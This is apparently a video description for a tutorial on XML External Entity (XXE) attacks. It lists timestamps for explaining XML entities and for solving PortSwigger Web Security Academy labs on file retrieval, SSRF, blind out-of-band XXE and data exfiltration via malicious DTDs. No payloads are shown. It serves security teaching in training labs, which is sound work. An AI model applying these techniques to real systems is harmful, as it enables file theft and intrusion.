Web App Pentesting: XML External Entities (XXE)

Explanation of XML External Entity (XXE) attacks with demos from Portswigger Web Security Academy (https://portswigger.net/web-security). 4:00 - Explanation of XML and XML Entities. 15:57 - Demonstrating entity expansion in the labs. 16:40 - Demonstrating recursive entity expansion in the labs. 19:03 - Solving the "Exploiting XXE using external entities to retrieve files" lab. 22:34 - Solving the "Exploiting XXE to perform SSRF attacks" lab. 28:04 - Solving the "Blind XXE with out-of-band interaction" lab. 32:10 - Solving the "Blind XXE with out-of-band interaction via XML parameter entities" lab. 36:35 - Solving the "Exploiting blind XXE to exfiltrate data using a malicious external DTD" lab. 43:59 - Solving the "Exploiting blind XXE to retrieve data via error messages" lab. 49:50 - Solving the "Exploiting XXE to retrieve data by repurposing a local DTD" lab. 54:17 - Solving the "Exploiting XInclude to retrieve files" lab. 58:05 - Solving the "Exploiting XXE via image file upload" lab. Please follow me on Twitter (https://twitter.com/tibsec) and join my Discord server (https://discord.gg/4qrvKMh).